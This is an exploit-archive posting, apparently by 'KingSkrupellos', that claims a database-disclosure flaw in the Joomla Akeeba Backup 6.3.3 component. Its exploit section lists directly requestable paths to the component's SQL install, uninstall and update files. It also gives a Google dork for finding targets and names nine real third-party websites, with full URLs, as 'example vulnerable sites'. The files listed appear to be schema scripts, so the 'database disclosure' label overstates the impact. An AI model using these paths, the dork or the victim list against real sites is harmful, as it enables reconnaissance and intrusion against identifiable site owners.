###################################################################################
# Exploit Title : Joomla Akeeba Backup Components 6.3.3 Database Disclosure
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 19/01/2019
# Vendor Homepage : akeebabackup.com
# Software Information Link : extensions.joomla.org/extension/akeeba-backup/
# Software Download Link : akeebabackup.com/download/akeeba-backup/6-3-3/pkg_akeeba-6-3-3-core-zip.zip
# Software Affected Version : 6.3.3
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:''/administrator/components/com_akeeba/''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
###################################################################################
# Description :
**************
Akeeba Backup Core is the most widely used open-source backup component for the Joomla! CMS.
Its mission is simple: create a site backup that can be restored on any Joomla!-capable server,
making it ideal not only for backups but also for site transfers or even deploying sites to your
clients' servers. Akeeba Backup creates a full backup of your site in a single archive.
The archive contains all the files, a database snapshot and an installer similar in function
to the standard Joomla! installer. The backup and restore process is AJAX powered
to avoid server timeouts, even with huge sites. Alternatively, you can make a backup of
only your database, or only your files. Akeeba Backup is the reliable, easy to use,
open source backup solution for your Joomla! site.
###################################################################################
# Database Disclosure Exploit :
***************************
/administrator/components/com_akeeba/sql/common/mysql.xml
/administrator/components/com_akeeba/sql/common/postgresql.xml
/administrator/components/com_akeeba/sql/common/sqlsrv.xml
/administrator/components/com_akeeba/sql/install/mysql/install.sql
/administrator/components/com_akeeba/sql/install/mysql/uninstall.sql
/administrator/components/com_akeeba/sql/install/sqlazure/install.sql
/administrator/components/com_akeeba/sql/install/sqlsrv/install.sql
/administrator/components/com_akeeba/sql/install/sqlsrv/uninstall.sql
/administrator/components/com_akeeba/sql/updates/mysql/3.5.0-[YEAR]-[MONTH]-[DAY].sql
/administrator/components/com_akeeba/sql/updates/mysql/3.5.0-2012-03-27.sql
/administrator/components/com_akeeba/sql/updates/mysql/3.6.0-2012-07-31.sql
/administrator/components/com_akeeba/sql/updates/sqlazure/3.5.0-[YEAR]-[MONTH]-[DAY].sql
/administrator/components/com_akeeba/sql/updates/sqlazure/3.5.0-2012-03-27.sql
/administrator/components/com_akeeba/sql/updates/sqlazure/3.6.0-2012-07-31.sql
/administrator/components/com_akeeba/sql/updates/sqlsrv/3.5.0-2012-03-27.sql
/administrator/components/com_akeeba/sql/updates/sqlsrv/3.5.0-[YEAR]-[MONTH]-[DAY].sql
/administrator/components/com_akeeba/sql/updates/sqlsrv/3.6.0-2012-07-31.sql
###################################################################################
# Example Vulnerable Sites :
*************************
[+] pentictonwebdesign.com/sites/stop/administrator/components/com_akeeba/sql/install/sqlsrv/install.sql
[+] pad.ribble-consultants.co.uk/joomla/administrator/components/com_akeeba/sql/install/mysql/uninstall.sql
[+] bainhotte.com/a%20sup/administrator/components/com_akeeba/sql/install/mysql/install.sql
[+] alsys.ma/administrator/components/com_akeeba/sql/install/sqlsrv/uninstall.sql
[+] farwestpizza.com/administrator/components/com_akeeba/sql/install/sqlsrv/install.sql
[+] leschaumieresdekerguan.com/administrator/components/com_akeeba/sql/install/sqlsrv/install.sql
[+] desertlearningcenter.org/joomla/administrator/components/com_akeeba/sql/install/sqlsrv/install.sql
[+] staszickutno.pl/staszickutno.pl/administrator/components/com_akeeba/sql/install/sqlsrv/install.sql
[+] prehisto.ch/administrator/components/com_akeeba/sql/install/sqlsrv/install.sql
###################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
###################################################################################